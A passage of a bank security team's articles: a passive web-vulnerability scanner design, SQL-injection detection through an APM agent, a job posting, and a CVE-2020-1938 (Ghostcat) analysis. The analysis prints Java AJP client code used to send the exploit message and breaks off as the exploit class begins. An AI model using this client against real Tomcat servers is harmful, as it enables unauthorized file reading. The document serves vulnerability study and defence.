所以因为以上两点的限制，就可以发现利用是非常局限的，当然也不排除黑客大佬们思路广阔而笔者才疏学浅的可能性，因此我也仅在这里给出自己的看法。

阅读原文

跳转微信打开

被动式漏洞扫描平台建设之路

Wed, 13 May 2020 14:15:00 +0800

原创平安银行应用安全 2020-05-13 14:15

传统的主动web扫描器面对大型企业成千上万站点的扫描需求时越来越显得捉襟见肘，被动扫描成为各个大厂扫描器的自研之路方向。为实现全行应用上线的自动化安全扫描，平安银行应用安全团队内部研发了命名为“ Hydra”的被动扫描平台。

Author:平安银行应用安全团队 - 王小林

0x00.前言

业务上线之前，通常需要进行一系列的安全扫描及工具检查，随着敏捷开发流程的推进，版本迭代的周期越来越短，传统的主动web扫描器（包括开源的、商用扫描器等）基于站点维度，扫描时进行大量的链接爬取，无法覆盖接口、孤岛链接，也无法深度融入内部研发流程，以及会有扫描配合成本耗费巨大等问题，这使得主动web扫描器在面对大型企业成千上万站点的扫描需求时越来越显得捉襟见肘。相对于传统的主动扫描，被动扫描则刚好弥补了这些缺点，各个大厂也纷纷走上了扫描器的自研之路。

为解决上述的需求，实现全行应用上线的自动化安全扫描，我们团队内部也研发了命名为 Hydra的被动扫描平台，在此也把我们的实践经历做一个分享。

0x01.架构设计

整个项目分为 6个模块，分别为流量消息网关、流量解析、扫描模块、日志模块、漏洞管理，资产收集，系统架构如下图：

如上图，从交换机获取到的流量会经过流量解析引擎，然后发送到消息队列等待扫描引擎的消费；其它来源的流量则经由消息网关转发到消息队列。扫描引擎从消息队列取到消息后先进行去静态，去重去脏后，再封装成任务对象，调用各插件进行扫描，扫描完成后若发现漏洞则持久化到 MySQL 数据库，漏洞数据库与漏洞管理系统对接，方便跟踪处理漏洞，形成漏洞管理闭环，同时扫描日志发送到ELK日志中心，方便后期排查。资产中心则是记录全行所有的主机，接口等信息，为资产元数据的建设提供数据。

0x02.数据源

Hydra的待扫描数据主要有以下几大来源：

测试区核心交换机
自动化测试平台（接口自动化测试平台）
Hydra插件　
代理服务器

从交换机接过来的流量为全协议的流量，需要先将三层协议的流量解析到七层，这里我们使用的是Zeek , Zeek是一个开源的网络流量分析工具，支持解析多种协议（包括DNS，FTP，HTTP，IRC，SMTP，SSH，SSL等）。详细介绍可参考官网文档Zeek Doc; (也可围观团队另外一位小伙伴写的Zeek食用指南《流量分析的瑞士军刀Zeek》，文章记录我们使用Zeek中一些经验与踩过的坑。) Zeek 解析流量后生成http.log 日志文件，然后使用 Filebeat读取 Zeek日志并发送到Logstash，使用 LogStash 初步过滤一些静态文件，例如img、png、docx 等。然后再组装成约定的 json格式发送到 Kafka;
Hydra第二大流量来源是自动化接口测试平台，其产生的测试流量经由消息网关传送到 Kafka;
针对其它场景，我们开发 chrome插件和 Burp插件，插件支持一些简单的文件，域名过滤。
Burp插件：
Chrome插件：
Burp插件主要是针对一些chrome插件不能使用场景的一个补充，如部分业务系统只能运行在IE浏览器中、app等，但这个插件对一般的功能测试人员门槛有点高。此插件也可作为内部安全同事测试时的一个补充。
代理服务器基于 MITMProxy 开发，客户端需要安装服务器证书以解密流量。

为了方便数据处理，所有传入到消息队列的数据需要约定统一格式，我们约定如下简要格式，其中 t为消息产生时间缀。对于post body数据，因为可能为流数据，所以我们简单的进行了base64编码后传送。

{
    "url": "http://testasp.vulnweb.com/showthread.asp?id=0",
    "headers": {
        "Host": "testasp.vulnweb.com",
        "Connection": "keep-alive",
        "Cache-Control": "max-age=0",
        "DNT": "1",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "ASPSESSIONIDQQBRQABB=FDKAKDNCHPAKFGGIMLNLFBLB"
    },
    "host": "testasp.vulnweb.com",
    "method": "GET",
    "source": "xxxx",
    "postdata": "",
    "t": 1565079259
}

为了不对生产环境产生影响，我们只扫描测试区的系统，利用域名/IP黑名单对在测试区不能扫描的服务器进行排除。

0x03. 数据解析

扫描引擎从消息队列取到一条消息之后，会先对其再次去静态（前期zeek已经去过一次），然后进行url归一化（如将协议名、主机名进行小写、去掉默认的 80 端口、消除多余的 /、 ..等等，具体可参考URI normalization），当然这里我们不会自己造轮子，前人已经为我们造好，我们只需做一个调包侠就好。之后进行url去重，去重规则利用的传统的hash去重，如拿到的url为：http://site.com/?get_key1=value1&get_key2=value2&get_key3=value3

取出其中的key值并排序后计算：md5("http://site.com/?get_key1|get_key2|get_key3")

计算出的md5去redis中查询是否存在，如果存在则认为是重复的报文，否则发往扫描引擎进行扫描。在这里需要考虑一些特殊的场景：伪静态，如下两个url:

/ path/202cb962ac59075b964b07152d234b70

/ path/c8ffe9a587b126f152ed3d89a146b445

如果利用hash去重机制则会认为是不同的url，如果存在大量这样的站点，则需要扫描的报文急剧增加，常见的做法是替换为同一等长字符，如约定用A替换，刚处理后的url为：

/ path/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

去重之后便需要对报文去脏，对于一些带有明显扫描攻击的payload的报文，我们需要将其剔除，这一类流量主要来自内网的其它扫描器等。

能进入到此步骤的便是我们需要扫描的报文了，为了方便各个插件的编写，我们需要将字符串的报文解析为对象，对于 post body ，因为格式太多，有json、key value、xml、multipart等难以满足一个统一的数据结构，当初一直在研究如何设计数据结构方便处理，后来看了下sqlmap 的源码，觉得其设计得较合理，便借鉴过来了。对于url中的参数处理则简单许多，直接将key与value拆分存放到 dict即可。如我们拿到一个报文：{"url":"http://site.com/?get_key1=value1&get_key2=value2&get_key3=value3","postdata":"a2V5MT12YWx1ZTEma2V5Mj12YWx1ZTIma2V5Mz12YWx1ZTM="}解析完成后数据结构如下：

{
    'GET': OrderedDict([('get_key1', 'value1'), ('get_key2', 'value2'), ('get_key3', 'value3')]),
    'POST': OrderedDict([
        ('key1', 'key1=value1__PAYLOAD_MARKER_PAYLOAD__&key2=value2&key3=value3'), 
        ('key2', 'key1=value1&key2=value2__PAYLOAD_MARKER_PAYLOAD__&key3=value3'), 
        ('key3', 'key1=value1&key2=value2&key3=value3__PAYLOAD_MARKER_PAYLOAD__')
   ])
}

为了简化插件开发，屏蔽报文操作细节内容，我们在其上封装了一个代理类，插件只需要告诉代理类poc是什么便可快速组装一个请求，对于插件编写人员，不需要了解具体的报文格式。这样就降低插件的开发难度。解析完成之后，引擎便会调用扫描插件进行扫描。

0x04. 插件

插件作为扫描器的核心有着举足轻重的地位，能不能"准确无误"的发现漏洞全靠扫描插件。在这里，非常感谢团队内的各个小伙伴一起为扫描器建设出谋划策和参与到插件的开发工作之中。对于插件编写，我们简单地约定了一套编写规则，每一个插件需要正确的覆写父类方法。引擎才能正确调用，如下简要父类模板：

class BaseMod(object):
    name = VulnName.BaseMod
    author = "xxx"
    vulType = vulType.Web
    level = Level.NONE
    references = None
    desc = None
    modType = ModType.PerScheme

    def __init__(self):
      """
      """
        self._request: Request = None
        self._vectors = None
        self._response = None
        self._vulnParams = ""

    def verify(self):
        """
        :return: return None if not vulnerable, else return a Output object
        """
        raise NotImplementedError("plugin must overwrite this method.")

新增一个扫描插件时，新增一个类继承自 BaseMod, 填写必要的信息，并重写 verify方法实现扫描逻辑，发现漏洞时，返回 Output的实例对象，由扫描引擎持久化漏洞数据。

为了提高扫描效率需要对插件进行正确分类。这里我们参考了awvs 插件分类规则，将插件分为如下五大类：

插件类型	简要说明
PerFile	扫描某个文件是否存在漏洞
PerFolder	扫描某个目录是否存在漏洞
PerScheme	扫描某个参数是否存在漏洞
PerServer	扫描某个服务器是否存在漏洞
Disable	处于开发测试或者禁用的插件，引擎不会加载此目录下的插件

每一个插件需要根据自己的扫描目标特点正确放置于相应的目录下，引擎会自动加载各目录下面的插件并为插件设置对应的类型值。目前，我们会周期性的对历史接口进行扫描。对于发现的漏洞利用邮件通过对应的开发负责人和对应的安全工程师，以方便及时跟进处理。

对于sql注入的检测，我们直接调用了sqlmap的api进行扫描。基于我行使用的数据库，删除了sqlmap中部分poc，这里需要注意的是，sqlmap会自动加载上次扫描的结果，对于已经修复过的漏洞如果再次扫描到，sqlmap 会直接提示存在漏洞，所以需要传入 flushSession参数，如下简单的例子：

sqliopts = 
{
    "url": url,
    "data": postdata,
    "method": method,
    "answers": "crack=N,dict=N",
    "cookie": cookie,
    "headers": header,
    "risk": 1,
    "level": 1,
    "agent": UA,
    "threads": 3,
    "timeout": TIMEOUT,
    "forceSSL": force_https,
    "flushSession": True,
    "proxy": proxy,
    "batch": True
}

对于sqlmap ，因其会发送大量的payload，所以不可避免的在会在测试环境插入大量脏数据，影响测试过程。在银行大量资金交易应用的场景下，影响较大，在项目初期，因未做好控制，被投诉好几次。对于黑盒扫描，脏数据一定是无法避免的，我们能做的就是尽量少产生脏数据。对于完全不能扫描的业务系统，使用黑名单屏蔽；对于其它的业务系统则采用授权扫描方式，并将扫描嵌入到sdlc中提高扫描覆盖率。业务在冒烟测试通过后的某个节点时间须手动触发扫描，授权完成后拉取记录的流量执行扫描，扫描平台自动生成扫描报告，如果没有扫描报告，安全卡点系统则拒绝其上线; 对于其它无版本的系统，则只扫描get请求，尽可能少产生脏数据。

另一条路则是不使用流量中的身份凭证，通过sso替换请求中的身份，这样对业务的影响则相对可控，但随之而来的问题，则是通过sso登录的安全扫描账号在对应的业务系统里面无数据，会产生漏报，所以需要我们权衡取舍。对于sql注入的扫描，我们这边有一些比较好的思路，基于我行已经大量部署的应用监控平台 cat，抓取服务运行时的堆栈数据，如执行的 sql语句等，然后进行离线分析。（可参考我们之前发的【企业快速实践部署IAST/RASP的一种新思路】）目前我们已经取得初步成就，正考虑逐步淘汰 sqlmap。

为了应对行内大量的流量处理，我们使用的集群方式，部署多台扫描引擎加快处理速度，但有可能qps过高，导致对方系统宕机，所以需要进行并发控制，我们使用的方式比较简单即控制线程数。

0x05. 应用

自19年中旬进行被动扫描器规划并进入开发，同年10月左右扫描器稳定运行，截至目前累计处理流量 1.5PiB，累计扫描报文40亿＋，发现大量安全漏洞。

扫描发现的漏洞落地到漏洞管理系统，由漏洞管理系统跟进处理流程。通过对接行内的资产cms、cmdb数据，我们可以由漏洞的ip信息直接定位到开发负责人，并快速通知负责人进行漏洞修复。

另一方面，我们能做的不仅仅只是扫描。当我们拿到全行的测试流量时，我们可以对流量进行分析，如资产分析，记录全行所有的主机资产信息；接口信息，分析各业务系统使用的组件等。在应急响应时，我们可以快速进行全行的资产扫描，定位风险资产。基于流量的检测手段（DAST）是我们检查工具集中重要的一部分，能做到的不仅仅是应用安全，还有各类安全合规层面的问题，例如是否接入sso，敏感信息是否掩码等等，之后自动将检测结果同步到发版卡点系统，即可做到各应用上线前的安全管控。

0x06. 总结

1、目前，被动扫描器已进入稳定运行状态，我们需要做的事就是优化各插件扫描效率，提高插件的准确率。对于行业难度检测的越权漏洞，我们团队目前也有一些不错的点子，同上面 sql 注入的检测原理，基于 cat利用iast技术，记录请求与服务端的堆栈信息进行分析对比，目前正在着手开发。

2、对于被动扫描器发现的漏洞，如果都需要人工去复测也是一件工程量比较大的量，我们也在考虑如何做到自动复测，在这一点上，唯一的困难就是会话问题，如果大部分网站都支持sso 的话就比较简单，直接内置两套账号密码便可以刷新会话，实现自动复测，但如果 sso 覆盖面比较少，做起来则比较繁琐。同样缺点前面也提到过，有可能安全扫描的账号无业务数据，造成精准度不高。这一点我们也在摸索中，有兴趣的伙伴也可以交流。

阅读原文

跳转微信打开

企业快速实践部署IAST/RASP的一种新思路

Thu, 30 Apr 2020 10:18:00 +0800

应用安全团队 2020-04-30 10:18

这里分享我们实践的一个新思路，能有效达到IAST/RASP快速部署的目的。

引言：

近两年，百度的OpenRasp在安全业内大火，各大厂的安全团队都在纷纷跟进研究，捣鼓自己的IAST/RASP产品。作为一支有追求的安全团队，自然要推动这类新兴技术在行内落地。但想要大面积覆盖全行应用中，项目的推广、适配、运维方面的挑战都是不小的。这里分享我们实践的一个新思路，能有效的达到快速部署的目的。

0×01挑战

IAST/RASP的原理这里就不介绍了，其主要优点就是检测精准。技术是好技术，但要在企业中大规模部署，它的缺点也很明显：

要实现大规模部署，我行几千应用系统、几万服务器的适配、测试、部署、维护…这推广、维护工作太重。
虽然在c0debreak大佬团队的努力下，rasp agent对服务器的性能影响已可控制到3%左右。但在银行交易系统中，我们也不敢轻易“玩火”，只能将目标锁定在后管类系统上。

好吧，觉得以上难搞也许是我的缺点。

除此之外，我行自动发版工具会将tomcat容器整包替换，导致之前部署的raspAgent丢失。虽然这个问题很好解决，但是提议的两个方案，都以不符合管理规范而惨遭否决。

0×02 一个不成熟的想法

如果不用从0推广Agent、不用适配测试、不用运维就能实现IAST/RASP能力的落地，那就好了～

理想一定要有，万一实现了呢。

然后，就有了以下这个思路：

实现也很简单，一些APM应用监控平台（如CAT、WiseAPM、Dapper等，我行使用的是CAT，本文以CAT为例）的客户端同IAST/RASP agent实现原理一致，用的是java字节码技术，通过插桩记录程序运用时的堆栈数据，来分析应用健康度。而它所监控的数据就有安全所感兴趣的，比如说原生sqllog、关联的接口信息、服务器信息等等。一般此类APM都是由架构运维部门负责，且基本能够覆盖绝大数业务系统，已完成从0到1的大面积推广及运维保障。如果安全赋（寄）能（生）在它们的agent上，就能解决我们的问题。

CAT架构

要基于CAT的Agent实现IAST/RASP的漏洞检测能力，规则放在客户端运行，CAT那边肯定是不会同意的，且可能对应用影响较大，不建议介入太深。只能看看安全关心的应用数据，然后再进行离线分析就可以了。当然具体能检测哪些问题，还是要看CAT做了哪些函数的插桩埋点，这里就不再赘述。下面以SQL注入为例，介绍下我们的实践过程。

0×03 技术实现

为什么要从SQL注入入手。原因有两点：

1.此类APM平台，基本上都有SQL性能分析，所以基本上都可以提供原生SQL数据，这是现成的。而其他漏洞可能还需要增加埋点。
2.去年我们团队搞了大半年的被动扫描器，由于SQL注入黑盒测试造成大量脏数据，以及准确率等问题，一直比较头疼。正好借此机会来优化一下。

首先需要CAT对原生sql进行一定的处理，补充记录所属应用、服务器IP、sql关联的接口等信息，最终形成sqllog。输出如下格式：

{"appid":"xxxx","ip":"192.168.1.100","source":"URL:/xxx/abc/custInfo.do","sql":"select * from t_user where username = ?"}

剩下就是将全行集成CAT的应用记录的所有sqllog收集下来，集中推送到安全的kafka中，再设计检测程序逐条消费。架构如下：

由于依赖于CAT，我们的项目代号为BlackCAT（黑猫警长）。上图中，被动扫描器只在主动式IAST场景下的充当无脑发包器，对抓的所有流量进行全量标记盲打，与BlackCAT分析引擎无需联动。有溯源必要时，可在request中加一些特征标识，如在url后或header中追加BlackCAT参数，通过catlog同步通知BlackCAT即可。

以mybatis项目监测情况为例，#{param}和${param}插桩JDBC记录到的sql是不一样的。预编译的sql的入参是占位符“？”，而使用拼接的sql可以看到入参内容。

预编译：
select * from t_user where username = ？
拼接：
select * from t_user where username = “helen”

但在真实复杂的应用场景中，还无法仅凭是否有占位符来判断是否存在sql注入，很多情况下，应用内部的sql也有很多，所有要确认是存在漏洞，还需要找到用户入口。

0×04 检测逻辑

理清了数据以及确定目标，就可以去设计离线检测策略了。目前我们共实现三种检测逻辑：mark标识位、黑名单检测、入参比对，分别对应测试环境中IAST漏洞扫描以及生产环境中RASP攻击监测（RASP暂时只实现告警）。

mark标识位（主动式 IAST）：

在被动扫描器上新增一个iast插件，对测试区全部流量进行参数注入，在value后拼接上一个标记字符串。

POST /xxx/abc/custInfo.do HTTP/1.1
Host: 192.168.1.100:80
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/admin
Accept-Language: zh-CN,zh;q=0.9
Cookie: token=123456789
username=helenMarkedbyscanner

BlackCAT异步监控分析全行应用的执行SQL。如在发现某些SQL中有标识位进入，则可判断该属主应用使用了拼接SQL且存在用户入口，存在安全漏洞。

select * from t_user where username = "helenMarkedbyscanner"

标识位检测日志

黑名单检测（RASP攻击告警）

这里目前实施了两种方式：

1.通过黑名单规则检索sql中的可疑的payload，这点参考WAF策略。相较于WAF，好在如果发现有payload进入sql，那就存在漏洞且攻击成功。但由于都是维护黑名单规则，即可能存在误报漏报。
2.统计在sql中检索单引号数量，判断总数是否为奇数引号。一般如出现奇数引号，可能为人为注入测试，可判断有潜在攻击者，且已发现漏洞。

入参比对（被动式IAST及RASP攻击告警）

入参比对是将request中的入参值与关联的sql的入参进行比对。

如发现二者入参数存在一致的value，则可确认存在漏洞，因为用户输入参数被拼接带入了sql中去。

在此基础上，再判断是否为攻击，可通过value是否被带入未转义的特殊字符（如空格，引号，斜杠等等），value是否包含除字符串以外的其他元素。如为真，存在攻击；也可以直接提取原生sql的查询条件value，分析对比请求入参是否能在提取的value中找到。如为假，则存在攻击。

0×05 效果

到此为止，我们就基于CAT初步实现了IAST/RASP能力了，虽然初期检测逻辑还略显粗糙，但在实际应用中，还是取得了不错的效果。测试区上线短短1周内，自动发现SQL注入30多例，内部安全同事的sql注入测试百余起。后期就是继续增加埋点和优化策略，来增加检测的漏洞类型。

测试区IAST漏洞扫描

生产区RASP攻击检测告警

这种美其名曰安全赋能，实则抱大腿的合作模式，其好处就在于可以快速、无感地推动IAST/RASP能力的大规模覆盖，且无需担心对应用有任何影响。当然，这样的IAST/RASP能力覆盖面取决于应用监控CAT的推广程度。在我行，全行绝大数应用都已集成CAT，其中包括各类重要核心应用。现在无论是生产还是测试，都不用考虑那些头疼的推广适配、部署运维，只要牢牢的抱住大腿…

参考：

https://github.com/baidu/openrasp

阅读原文

跳转微信打开

招聘｜平安银行2020年安全人才招募令！

Thu, 12 Mar 2020 17:46:00 +0800

原创平安银行应用安全 2020-03-12 17:46

加入平安银行，“橙”就不一样！

平安银行股份有限公司（英文：PING AN BANK CO.,LTD.；简称平安银行），是一家总部位于广东省深圳市的全国性股份制商业银行，是中国平安集团旗下子公司，同时也是平安集团三大业务支柱之一。其前身深圳发展银行是中国内地首家公开上市的全国性股份制银行。截至2019年6月末，在职员工33,529人，通过全国84家分行、1,053家营业机构为客户提供多种金融服务。

✎✎✎

在处于零售转型的高速发展时期，平安银行践行科技赋能，并更加重视信息安全的发展与建设。平安银行应用安全团队致力于保障行内应用安全，共建金融行业的应用安全生态环境。

这是一个牛人辈出且有爱的团队，一个够大且发展快速的平台，同时还有一份还不错的薪水！

期待热爱互联网、热爱安全，同时在安全领域有一技之长的你！

资深安全开发工程师(Python或Java方向)

岗位职责：

1.负责各类安全工具平台、安全产品的建设研发，包括流量处理、RASP、 DAST、 SAST 等各类安全工具平台的建设研发；

2.负责建设支撑SDLC流程节点的各类工具平台，落实全行应用安全治理上相关的要求及检查机制的自动化闭环；

3.推动研发流程及相关基础技术架构的持续优化完善。

岗位要求:

1.扎实的编程基础、精通Java、 Python开发语言，熟悉JVM、Kafka、 ELK、 Spark、分布式等核心技术；

2.熟悉软件开发生命周期(SDLC)，熟悉业内主流的安全机制、安全解决方案、安全体系优先；

3.有相关的安全工具平台开发经验，包括不限于动态、静态等各类漏洞检测、流量处理、资产采集等经验；

4.熟练掌握主流开发框架，如Spring、 MyBatis, 熟悉高可用、高性能优化方案；

5.思路清晰、较好的沟通能力与技术学习能力，有强烈责任心及团队意识；

6.本科以上、3年以上互联网公司经历优先。

数据安全治理专家

岗位职责:

1. 发现数据安全生命周期各环节面临的安全风险，并制定相关的风险管控方案，建设数据安全保护平台形成对数据全生命周期的保护；

2.辅助数据治理的相关方推动复杂数据治理行动，推动数据治理相关方案的工具化、线上化，从而保证银行数据数据互通方面的效率和安全性；

3.结合监管及银行安全合规要求，形成系统化的平台来实现风险控制及监控，包括不限于自动化加密、脱敏引擎，敏感数据识别分级打标引擎的落地及优化；

4.通过算法和权限管控结合现有银行数据输入输出的业务需求，对输入输出的数据进行安全合规的审计及智能化的审批，提升数据交互时的安全管控及效率:

5.在国家标准及行业标准的基础上提升，保障业务的前提下，全面提高银行在数据安全方面的能力。

岗位要求:

1.有数据安全风险治理的专项工作经验(数据脱敏、数据加密、api 治理、数据资产地图、隐私保护) ;

2.熟悉各种常见通用加密算法(AES、RSA、 SHA以及国密等)，以及隐私保护算法(K-匿名、差分隐私、L-多样性)，掌握相关安全通信协议、熟悉签名认证；

3.掌握数据安全和隐私保护方面的安全技术，对国家相关法律法规及行业标准有深入理解；

4.了解大数据业务建模、数据仓库建模、元数据、数据血缘及其实现方法有全局化的数据架构能力相关经验更佳；

5.熟悉常用关系型数据库或非关系型数据库以及常见搜索系统；

6.掌握python/java/go等至少一门编程语言;

7.在风险识别、分析、研判、管控方面有深入的理解，有良好的业务感知和理解能力；

8.工作态度严谨，风险意识强，有较强的独立分析及解决问题的能力，良好的表达沟通能力，敢于挑战、勇于创新；

9.工作经验：5年以上安全行业工作经验(数据安全、应用安全、信息安全、安全运营)，有金融行业工作背景优先；

10.学历：本科及以上。

工作地点：上海

简历投至邮箱：peiling757@pingan.com.cn

如有疑问，可联系小编咨询

（微信：pl1147662621）

“

未来，我行将继续积极响应国家战略，顺应国际国内经济金融形势，遵循新的“3+2+1”经营策略，持续提升实体经济服务能力，坚守不发生系统性金融风险的底线，全面推进AI Bank体系建设，向着“中国最卓越、全球领先的智能化零售银行”的目标不断迈进。

”

阅读原文

跳转微信打开

Apache AJP 协议 CVE-2020-1938 漏洞分析

Mon, 24 Feb 2020 21:42:00 +0800

原创 Glassy 2020-02-24 21:42

最近CVE-2020-1938炒的比较热闹，前几天比较忙，今天抽空跟了一下这个漏洞，时间线上肯定比别的大佬晚很多了，所以就选择从环境搭建开始写的详细一点，对这个漏洞多少还有一些困惑的同学可以赏脸看上两眼吧。

**author:Glassy@平安银行应用安全团队**

环境搭建

这里使用的是tomcat8.0.52的测试环境，因为tomcat默认开启AJP协议，所以我们这边只需要配置好tomcat的远程debug环境就行。

1、找到catalina.sh去定义一下远程调试端口，我这里就使用了默认的5005端口。

``` sh  if [ -z "$JPDA_ADDRESS" ]; then    JPDA_ADDRESS="localhost:5005"  fi```

2、以调试模式开启tomcat，这里不推荐直接改动tomcat的默认启动模式，否则以后都会默认开启调试模式，因此推荐直接以调试模式开启tomcat。

``` shsh catalina.sh jpda start```

3、在idea的lib里导入tomcat的jar包，tomcat的jar都放在lib目录下，直接把lib都导进来就行。

接下来在idea里开启tomcat的远程调试环境就部署完成。

AJP（Apache JServ Protocol）是定向包协议。它的功能其实和HTTP协议相似，区别在于AJP协议使用的是二进制格式传输文本，走的是TCP协议来SERVLET容器进行通信，因此漏洞的利用就需要依赖于一个客户端，而不能依赖于浏览器或是HTTP的抓包工具。

因为是java的漏洞，因此但从网上的py的poc很难看出AJP协议相关的很多东西，所以这里我们再去看一下用于发送AJP消息的java的客户端代码。客户端代码引自[0nise的GitHub](https://github.com/0nise/CVE-2020-1938)。

目录结构如下，因为代码需要依赖tomcat本身的AJP相关jar包，所以也要加入tomcat的lib，

``` javafile:TesterAjpMessage.java
package com.glassy.utility;
import java.util.ArrayList;import java.util.LinkedHashMap;import java.util.List;import java.util.Map;import java.util.Map.Entry;import org.apache.coyote.ajp.AjpMessage;import org.apache.coyote.ajp.Constants;import org.apache.juli.logging.Log;import org.apache.juli.logging.LogFactory;
public class TesterAjpMessage extends AjpMessage {    private final Map attribute = new LinkedHashMap();    private final List headers = new ArrayList();    private static final Log log = LogFactory.getLog(AjpMessage.class);
    private static class Header {        private final int code;        private final String name;        private final String value;
        public Header(int code, String value) {            this.code = code;            this.name = null;            this.value = value;        }
        public Header(String name, String value) {            this.code = 0;            this.name = name;            this.value = value;        }
        public void append(TesterAjpMessage message) {            if (this.code == 0) {                message.appendString(this.name);            } else {                message.appendInt(this.code);            }            message.appendString(this.value);        }    }
    public TesterAjpMessage(int packetSize) {        super(packetSize);    }
    public byte[] raw() {        return this.buf;    }
    public void appendString(String str) {        if (str == null) {            log.error(sm.getString("ajpmessage.null"), new NullPointerException());            this.appendInt(0);            this.appendByte(0);        } else {            int len = str.length();            this.appendInt(len);
            for(int i = 0; i < len; ++i) {                char c = str.charAt(i);                if (c <= 31 && c != '\t' || c == 127 || c > 255) {                    c = ' ';                }
                this.appendByte(c);            }
            this.appendByte(0);        }    }
    public byte readByte() {        byte[] bArr = this.buf;        int i = this.pos;        this.pos = i + 1;        return bArr[i];    }
    public int readInt() {        byte[] bArr = this.buf;        int i = this.pos;        this.pos = i + 1;        int val = (bArr[i] & 255) << 8;        bArr = this.buf;        i = this.pos;        this.pos = i + 1;        return val + (bArr[i] & 255);    }
    public String readString() {        return readString(readInt());    }
    public String readString(int len) {        StringBuilder buffer = new StringBuilder(len);        for (int i = 0; i < len; i++) {            byte[] bArr = this.buf;            int i2 = this.pos;            this.pos = i2 + 1;            buffer.append((char) bArr[i2]);        }        readByte();        return buffer.toString();    }
    public String readHeaderName() {        byte b = readByte();        if ((b & 255) == 160) {            return Constants.getResponseHeaderForCode(readByte());        }        return readString(((b & 255) << 8) + (getByte() & 255));    }
    public void addHeader(int code, String value) {        this.headers.add(new Header(code, value));    }
    public void addHeader(String name, String value) {        this.headers.add(new Header(name, value));    }
    public void addAttribute(String name, String value) {        this.attribute.put(name, value);    }
    public void end() {        appendInt(this.headers.size());        for (Header header : this.headers) {            header.append(this);        }        for (Entry entry : this.attribute.entrySet()) {            appendByte(10);            appendString((String) entry.getKey());            appendString((String) entry.getValue());        }        appendByte(255);        this.len = this.pos;        int dLen = this.len - 4;        this.buf[0] = (byte) 18;        this.buf[1] = (byte) 52;        this.buf[2] = (byte) ((dLen >>> 8) & 255);        this.buf[3] = (byte) (dLen & 255);    }
    public void reset() {        super.reset();        this.headers.clear();    }}
```

这个TesterAjpMessage.java文件就是一个tomcat本身用来处理AJP协议信息的AjpMessage类的子类，因为AjpMessage只支持发送bytes信息的缘故，代码丰富了TesterAjpMessage子类，使我们在构造客户端的时候支持appendString以及对Header的相关操作，更加方便。

``` javafile:SimpleAjpClient.java
import java.io.IOException;import java.io.InputStream;import java.net.Socket;import java.util.Arrays;import javax.net.SocketFactory;
public class SimpleAjpClient {    private static final byte[] AJP_CPING;    private static final int AJP_PACKET_SIZE = 8192;    private String host = "localhost";    private int port = -1;    private Socket socket = null;
    static {        TesterAjpMessage ajpCping = new TesterAjpMessage(16);        ajpCping.reset();        ajpCping.appendByte(10);        ajpCping.end();        AJP_CPING = new byte[ajpCping.getLen()];        System.arraycopy(ajpCping.getBuffer(), 0, AJP_CPING, 0, ajpCping.getLen());    }
    public int getPort() {        return this.port;    }
    public void connect(String host, int port) throws IOException {        this.host = host;        this.port = port;        this.socket = SocketFactory.getDefault().createSocket(host, port);    }
    public void disconnect() throws IOException {        this.socket.close();        this.socket = null;    }
    public TesterAjpMessage createForwardMessage(String url) {        return createForwardMessage(url, 2);    }
    public TesterAjpMessage createForwardMessage(String url, int method) {        TesterAjpMessage message = new TesterAjpMessage(8192);        message.reset();        message.getBuffer()[0] = (byte) 18;        message.getBuffer()[1] = (byte) 52;        message.appendByte(2);        message.appendByte(method);        message.appendString("http");        message.appendString(url);        message.appendString("10.0.0.1");        message.appendString("client.dev.local");        message.appendString(this.host);        message.appendInt(this.port);        message.appendByte(0);        return message;    }
    public TesterAjpMessage createBodyMessage(byte[] data) {        TesterAjpMessage message = new TesterAjpMessage(8192);        message.reset();        message.getBuffer()[0] = (byte) 18;        message.getBuffer()[1] = (byte) 52;        message.appendBytes(data, 0, data.length);        message.end();        return message;    }
    public void sendMessage(TesterAjpMessage headers) throws IOException {        sendMessage(headers, null);    }
    public void sendMessage(TesterAjpMessage headers, TesterAjpMessage body) throws IOException {        this.socket.getOutputStream().write(headers.getBuffer(), 0, headers.getLen());        if (body != null) {            this.socket.getOutputStream().write(body.getBuffer(), 0, body.getLen());        }    }
    public byte[] readMessage() throws IOException {        InputStream is = this.socket.getInputStream();        TesterAjpMessage message = new TesterAjpMessage(8192);        byte[] buf = message.getBuffer();        int headerLength = message.getHeaderLength();        read(is, buf, 0, headerLength);        int messageLength = message.processHeader(false);        if (messageLength < 0) {            throw new IOException("Invalid AJP message length");        } else if (messageLength == 0) {            return null;        } else {            if (messageLength > buf.length) {                throw new IllegalArgumentException("Message too long [" + Integer.valueOf(messageLength) + "] for buffer length [" + Integer.valueOf(buf.length) + "]");            }            read(is, buf, headerLength, messageLength);            return Arrays.copyOfRange(buf, headerLength, headerLength + messageLength);        }    }
    protected boolean read(InputStream is, byte[] buf, int pos, int n) throws IOException {        int read = 0;        while (read < n) {            int res = is.read(buf, read + pos, n - read);            if (res > 0) {                read += res;            } else {                throw new IOException("Read failed");            }        }        return true;    }}
```

SimpleAjpClient便是发送AJP消息的客户端代码，支持服务端的连接与断开，支持对AJP消息头和消息体的构造。

关于整个AJP消息的消息头消息体怎么构造，消息头里面的code的值又是怎样额对应关系可以去参考[AJP协议总结与分析](https://www.cnblogs.com/softidea/p/5735102.html)

关于

漏洞分析

先看一下发送的恶意AJP消息包是怎么构造的，

``` javafile:Test.java
import com.glassy.utility.SimpleAjpClient;import com.glassy.utility.TesterAjpMessage;
import java.io.IOException;import javax.servlet.RequestDispatcher;
